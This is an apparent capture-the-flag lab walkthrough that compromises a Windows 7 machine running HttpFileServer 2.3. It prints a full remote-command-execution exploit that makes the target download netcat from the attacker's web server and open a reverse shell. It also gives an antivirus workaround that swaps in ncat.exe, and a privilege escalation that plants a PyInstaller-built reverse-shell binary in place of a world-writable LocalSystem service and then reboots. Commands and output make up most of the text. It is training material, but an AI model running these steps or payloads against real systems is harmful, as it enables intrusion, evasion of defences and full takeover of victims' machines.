Walkthrough № 1:

Ports found:

21/tcp    open  ftp           FileZilla ftpd 0.9.41 beta
80/tcp    open  http          Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2h PHP/5.6.24)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp   open  ssl/http      Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2h PHP/5.6.24)
445/tcp   open  microsoft-ds  Microsoft Windows 7 - 10 microsoft-ds (workgroup: CSI)
3306/tcp  open  mysql         MariaDB (unauthorized)
3389/tcp  open  ms-wbt-server Microsoft Terminal Service
28580/tcp open  http          HttpFileServer httpd 2.3b

 
Now lets HACK.

I will call to our (Kali) attacking machine as <attack>
To our target (win7) machine as <target>

Create working folder on your kali machine, i named it CTF2-2

cd Desktop/
mkdir CTF2-2

MSFCONSOLE > (exploit/windows/http/rejetto_hfs_exec) exploit will not work here…
Antivirus is on =)

So lets try to find some other exploit?..


Found it!

https://www.exploit-db.com/exploits/39161/

Actually we used him in the class…

Download and rename it:

wget https://www.exploit-db.com/download/39161.py -O exploit.py
wget https://www.exploit-db.com/download/39161.py -O exploit.py
 
--2017-12-13 17:28:28--  https://www.exploit-db.com/download/39161.py
Resolving www.exploit-db.com (www.exploit-db.com)… 192.124.249.8
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.8|:443… connected.
HTTP request sent, awaiting response… 200 OK
Length: 2515 (2.5K) [application/txt]
Saving to: ‘exploit.py’
exploit.py          100%[===================>]   2.46K  --.-KB/s    in 0s
2017-12-13 17:28:29 (21.3 MB/s) -- ‘exploit.py’ saved [2515/2515]

Give executable permissions:

chmod u+x exploit.py

Now lets edit the file:

nano exploit.py

Go to line 35,36 and change vars:

ip_addr = "192.168.0.40" <- Our Kali machine local address.
local_port = "443" <- lets leave it as 443 port to listen for.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
#!/usr/bin/python
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 04-01-2016
# Remote: Yes
# Exploit Author: Avinash Kumar Thapa aka "-Acid"
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
# Description: You can use HFS (HTTP File Server) to send and receive files.
#          It's different from classic file sharing because it uses web technology to be more compatible with today's Internet.
#          It also differs from classic web servers because it's very easy to use and runs "right out-of-the box". Access your remote files, over the network. It has been successfully tested with Wine under Linux.
 
#Usage : python Exploit.py <Target IP address> <Target Port Number>
 
#EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe).  
#          You may need to run it multiple times for success!
 
 
import urllib2
import sys
 
try:
    def script_create():
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+save+".}")
 
    def execute_script():
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe+".}")
 
    def nc_run():
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe1+".}")
 
    ip_addr = "192.168.0.40" #local IP address
    local_port = "443" # Local Port number
    vbs = "C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with"
    save= "save|" + vbs
    vbs2 = "cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs"
    exe= "exec|"+vbs2
    vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"+ip_addr+"%20"+local_port
    exe1= "exec|"+vbs3
    script_create()
    execute_script()
    nc_run()
except:
    print """[.]Something went wrong..!
    Usage is :[.] python exploit.py <Target IP address>  <Target Port Number>
    Don't forgot to change the Local IP address and Port number on the script"""

This script takes 'nc.exe' file from your http server, http://192.168.0.40/nc.exe
Tells <target> to download 'nc.exe', and than to execute it; nc.exe -e cmd.exe to our <attacking> ip and port:

C:/Users/Public/nc.exe -e cmd.exe 192.168.0.40 443

Now when we know what this script is doing, lets prepare our <target> to use it;
First lets check our apache2 server status:

service apache2 status
service apache2 status
● apache2.service - The Apache HTTP Server
Loaded: loaded (/lib/systemd/system/apache2.service; disabled; vendor preset:
Active: inactive (dead)

If apache2 is not "active (running)" start it:

service apache2 start

Now lets put 'nc.exe' file in our apache2 server path;
First locate 'nc.ex'e on out <attacking> machine:

locate nc.exe
locate nc.exe
 
/usr/share/sqlninja/apps/nc.exe
/usr/share/windows-binaries/nc.exe

Copy to apache2 server path:

cp /usr/share/windows-binaries/nc.exe /var/www/html/nc.exe

Check if the copy succeeded:

ls -l /var/www/html/
ls -l /var/www/html/
 
total 76
-rw-r--r-- 1 root root 10701 Nov  9 15:39 index.html
-rw-r--r-- 1 root root   612 Nov  9 15:38 index.nginx-debian.html
-rwxr-xr-x 1 root root 59392 Dec 14 11:30 nc.exe

Lets open listener and also check if the downloading is working;
open new terminal window and open listener on port 443:

nc -nvlp 443
nc -nvlp 443
listening on [any] 443 ...

Now lets open apache2 access.log to check, if GET request is working;

tail -f -n 0 /var/log/apache2/access.log
tail -f -n 0 /var/log/apache2/access.log

Okay, time to exploit!

Check if you are located in /Desktop/CTF2-2 folder.
Lets run the script:
p.s
Maybe you will need to run the script many times.

python exploit.py <target ip> 28580

Run it until you will receive messages from your access.log listener:

root@kali:~/Desktop/CTF2-2# service apache2 restart
root@kali:~/Desktop/CTF2-2# python exploit.py 200.0.0.28 28580
root@kali:~/Desktop/CTF2-2# python exploit.py 200.0.0.28 28580
root@kali:~/Desktop/CTF2-2#

Don't run the exploit when you will receive log information:

tail -f -n 0 /var/log/apache2/access.log
192.168.0.47 - - [14/Dec/2017:12:54:42 +0200] "GET /nc.exe HTTP/1.1" 200 59698 "-" "Mozilla/
4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2;
.NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"
192.168.0.47 - - [14/Dec/2017:12:54:42 +0200] "GET /nc.exe HTTP/1.1" 200 59698 "-" "Mozilla/
4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2;
.NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"
192.168.0.47 - - [14/Dec/2017:12:54:43 +0200] "GET /nc.exe HTTP/1.1" 200 59698 "-" "Mozilla/
4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2;
.NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"
192.168.0.47 - - [14/Dec/2017:12:54:43 +0200] "GET /nc.exe HTTP/1.1" 200 59698 "-" "Mozilla/
4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2;
.NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"

And we can see that <target> do download the 'nc.exe' file because the GET return 200 request; 200 means OK.
But... wait... the nc listener does NOT open the shell...
Why?..
Something went wrong here....
Maybe the porst are firewalled?
Or maybe some Antivirus?

Ill just say TRY HARDER!

Okay, from here we are going to hack the <target>... Really!

The <target> machine got AntiVirus that recognize our 'nc.exe' file, not by name of course...
And imitatively deletes the file, so our exploit can't execute it... Because no file, Ya?!

So i used the simplest solution... i took the 'ncat.exe' file from our <attack> machine;

locate ncat.exe
locate ncat.exe
 
/usr/share/ncat-w32/ncat.exe

Replace 'nc.exe' with 'ncat.exe' on our http server:

cp /usr/share/ncat-w32/ncat.exe /var/www/html/nc.exe

Check if the replace succeded:

ls -l /var/www/html
ls -l /var/www/html
 
total 1648
-rw-r--r-- 1 root root   10701 Nov  9 15:39 index.html
-rw-r--r-- 1 root root     612 Nov  9 15:38 index.nginx-debian.html
-rwxr-xr-x 1 root root 1667584 Dec 14 13:12 nc.exe

You can see that 'nc.exe' file size is 1667584, previously the size was 59392, you can check the GREEN line that i marked previously on this article =)

Now sit comfortably, and enjoy.

Run the script again, until your listener will open the shell!;
Took me 2 times to run the script.

python exploit.py 192.168.0.47 28580

You should see this on your listener:

nc -nvlp 443
listening on [any] 443 ...
connect to [200.0.0.27] from (UNKNOWN) [200.0.0.28] 49539
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
 
C:\Users\john\Downloads\hfs2.3b>

Great! We got reverse shell =)
Lets check who am i? Type 'whoami' on the shell:

whoami

You will see:

whoami
box2-1\john

Good, we are inside, but not as a system...
What to do now?
Try Harder, or continue reading!..
...
...
...
...

Go, Get the System!

Now we need to check what services the system run:

wmic service get name,pathname

We get long list. We can get a shorter one, to display services that does not run from Windows/System

wmic service get name,pathname | findstr /i /v /c:windows /c:"\""

Now lets check the permissions of the services by typing icacls "full path" :

icacls "C:\Program Files\Photodex\ProShow Producer\ScsiAccess.exe"

And we can see that this service got full permissions for Everyone!

icacls "C:\Program Files\Photodex\ProShow Producer\ScsiAccess.exe"
C:\Program Files\Photodex\ProShow Producer\ScsiAccess.exe NT AUTHORITY\SYSTEM:(I)(F)
                                                          BUILTIN\Administrators:(I)(F)
                                                          BUILTIN\Users:(I)(RX)
                                                          Everyone:(CI)(F)

Successfully processed 1 files; Failed processing 0 files

Lets check if the service runs under System and what Start type he is:

sc qc ScsiAccess

We can see that this service runs under LocalSystem and Start Type us Auto_Start, that means that the service starts up automatically on boot.

sc qc ScsiAccess
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ScsiAccess
        TYPE               : 10  WIN32_OWN_PROCESS 
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Photodex\ProShow Producer\ScsiAccess.exe
        LOAD_ORDER_GROUP   : 
        TAG                : 0
        DISPLAY_NAME       : ScsiAccess
        DEPENDENCIES       : 
        SERVICE_START_NAME : LocalSystem

Prepare to get in as a System

1. Create 'tmp' dir on disk C:

cd C:/
mkdir tmp
cd tmp

You should be at

C:\tmp>

2. Go to your windows 7 machine with PyInstaller and make ScsiAccess.py file with this code:

from time import sleep
from os import system
import sys

sleep(60)
system("C:\\users\\public\\nc.exe -nvv 192.168.0.40 4444 -e cmd.exe ")
sys.exit(0)

Why not make root.exe file with msfvenom like we did in class?
a. longer
b. AntiVirus detects it...
But we already know that our ncat works like a charm =)
Also, please notice; i'm opening 4444 port.

lets create ScsiAccess.exe file:

C:\PyInstaller-2.1>python PyInstaller.py --onefile --noconsole ScsiAccess.py

The file created at "C:\PyInstaller-2.1\ScsiAccess\dist\ScsiAccess.exe"
Move it to your <attack> machine, to your ftp folder

3. On <target> machines shell, rename 'ScsiAccess.exe':

move "C:\Program Files\Photodex\ProShow Producer\ScsiAccess.exe" "C:\Program Files\Photodex\ProShow Producer\ScsiAccessGood.bak"

Check if the file renamed:

dir "C:\Program Files\Photodex\ProShow Producer\"

4. Move 'ScsiAccess.exe' from your <attack> machine to <target>
Edit user and pass, then paste this code in shell:

echo open 192.168.0.40>ftp.txt
echo "your ftp user">>ftp.txt
echo "your ftp pass">>ftp.txt
echo bin>>ftp.txt
echo get ScsiAccess.exe>>ftp.txt
echo bye>>ftp.txt

Press 'enter' again!
Check if file 'ftp.txt' have been created:

type ftp.txt

Please remember that u need to have 'ScsiAccess.exe' located in your <attack> ftp folder.
Get 'ScsiAccess.exe':

ftp -s:ftp.txt

You will see that connection created, and Getting file processing:

ftp -s:ftp.txt
User (200.0.0.27:(none)): open 200.0.0.27


bin
get ScsiAccess.exe
bye


Check if file have downloaded to folder:

dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 8AA4-515F

 Directory of c:\tmp

12/14/2017  04:06 PM              .
12/14/2017  04:06 PM              ..
12/14/2017  04:03 PM                60 ftp.txt
12/14/2017  04:06 PM         3,826,479 ScsiAccess.exe
               2 File(s)      3,826,539 bytes
               2 Dir(s)  14,120,243,200 bytes free

Move 'ScsiAccess.exe' to origin file folder:

move "C:\tmp\ScsiAccess.exe" "C:\Program Files\Photodex\ProShow Producer\"

Check if moved successfully:

dir "C:\Program Files\Photodex\ProShow Producer\"

Should have those files:

12/14/2017  04:06 PM         3,826,479 ScsiAccess.exe
02/28/2017  06:21 AM           186,760 ScsiAccessGood.bak

5. Reboot the <target> machine, sit back and wait.
Before you reboot, don't forget to open a new listener on port 4444!

nc -nvlp 4444

Now you can restart the <target> machine:

shutdown -r -f -t 0

I went to make a cup of Coffee, when i returned i saw this:

nc -nvlp 4444
listening on [any] 4444 ...
connect to [200.0.0.27] from (UNKNOWN) [200.0.0.28] 49171
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
 

HAPPY HACKING!

  • Altoro Mutual – Get SHELL!

    Altoro Mutual ~$ Known as “Hack me” site made by IBM. This site got all possib…
  • $ Honeypot – all ports are OPEN.

    This script acts as a simple honeypot. It answers every SYN with a SYN/ACK. This will make…

Comments on Liors CTF2-2 Walkthrough

Check Also

Protected: CHAOS Payload Generator Analysis

There is no excerpt because this is a protected post. …